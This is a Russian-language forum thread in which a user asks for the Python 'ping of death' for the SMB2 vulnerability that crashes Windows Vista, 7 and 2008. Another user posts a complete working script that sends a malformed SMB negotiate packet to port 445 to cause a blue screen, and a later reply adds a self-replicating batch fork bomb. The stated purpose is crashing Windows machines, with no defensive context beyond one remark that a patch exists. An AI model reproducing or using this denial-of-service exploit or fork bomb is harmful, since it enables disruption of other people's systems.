помогите найти тему - критическая уязвимость SMB2

0

0

сабж. недавно тут была тема про уязвимость в SMB2, и висту, севен и 2008 можно было уронить "пингом смерти" на питоне. ищу, собственно, сам этот "пинг" :)

Ссылка

←	Улучшу всем настроение

[online compilier] А вот посмотрите, какую цацу я разыскал!

→

cat smb_bsod.py
#!/usr/bin/python
#When SMB2.0 recieve a "&" char in the "Process Id High" SMB header field
#it dies with a PAGE_FAULT_IN_NONPAGED_AREA error

from socket import socket
from time import sleep

host = "IP_ADDR", 445
buff = (
"\x00\x00\x00\x90" # Begin SMB header: Session message
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Negociate Protocol
"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
"\x00\x26"# Process ID High: --> :) normal value should be "\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
"\x30\x30\x32\x00"
)
s = socket()
s.connect(host)
s.send(buff)
s.close()

wyldrodney ☆
(12.11.09 13:17:00 MSK)

http://rghost.ru/605556

wyldrodney ☆
(12.11.09 13:17:39 MSK)

Ссылка

Ответ на: комментарий от wyldrodney 12.11.09 13:17:00 MSK

спасибо!

~~opensuse~~ ★
(12.11.09 13:18:58 MSK) автор топика

Ответ на: комментарий от opensuse 12.11.09 13:18:58 MSK

Уже отработало? :)

wyldrodney ☆
(12.11.09 13:19:33 MSK)

Ответ на: комментарий от wyldrodney 12.11.09 13:19:33 MSK

неа, хрен.
на трех вистах проверил - не падают :(

~~opensuse~~ ★
(12.11.09 13:24:51 MSK) автор топика

помогите висту уронить :)

~~opensuse~~ ★
(12.11.09 13:30:26 MSK) автор топика

Ответ на: комментарий от opensuse 12.11.09 13:24:51 MSK

уже давно вышел патч закрывающий эту дыру

sansei ☆
(12.11.09 13:41:29 MSK)

Ссылка

Ответ на: комментарий от opensuse 12.11.09 13:30:26 MSK

Для этого много не надо. Мне вчера хватило просто как обычно вставить флешку, и в течении пары минут получить BSOD... Вирусов на флешке нет, Vista до этого работала несколько дней(с саспендом). После слувишегося каждая загрузка роняла её в момент показа рабочего стола. Загрузился с Ubuntu LiveCD и... винт определяется, но видно разделы для монтирования О_о Релоаднулся - это чудо наконец-то заработало.

Andru ★★★★
(12.11.09 13:41:40 MSK)

Ответ на: комментарий от Andru 12.11.09 13:41:40 MSK

но не видно

fixed

Andru ★★★★
(12.11.09 13:45:19 MSK)

Ссылка

Ответ на: комментарий от opensuse 12.11.09 13:30:26 MSK

>помогите висту уронить :)

У меня WiFi dongle DLink'овский ронял висту при коннекте.

Anounax ★
(12.11.09 13:47:22 MSK)

Ссылка

http://paste.org.ru/?kraoj3
То же самое, но на perl.

AITap ★★★★★
(12.11.09 13:53:12 MSK)

Ответ на: комментарий от opensuse 12.11.09 13:30:26 MSK

помогите висту уронить :)

@ECHO OFF
REM Форк-бомба
REM Сохранить как файл с расширением cmd и запустить
:OMG
START IEXPLORE
START IEXPLORE
START IEXPLORE
START IEXPLORE
START IEXPLORE
START IEXPLORE
START IEXPLORE
START IEXPLORE
START IEXPLORE
START IEXPLORE
START IEXPLORE
START IEXPLORE
START IEXPLORE
START %0
START %0
START %0
START %0
START %0
START %0
START %0
START %0
START %0
START %0
START %0
START %0
START %0
START %0
START %0
START %0
START %0
START %0
START %0
START %0
GOTO OMG

AITap ★★★★★
(12.11.09 14:02:36 MSK)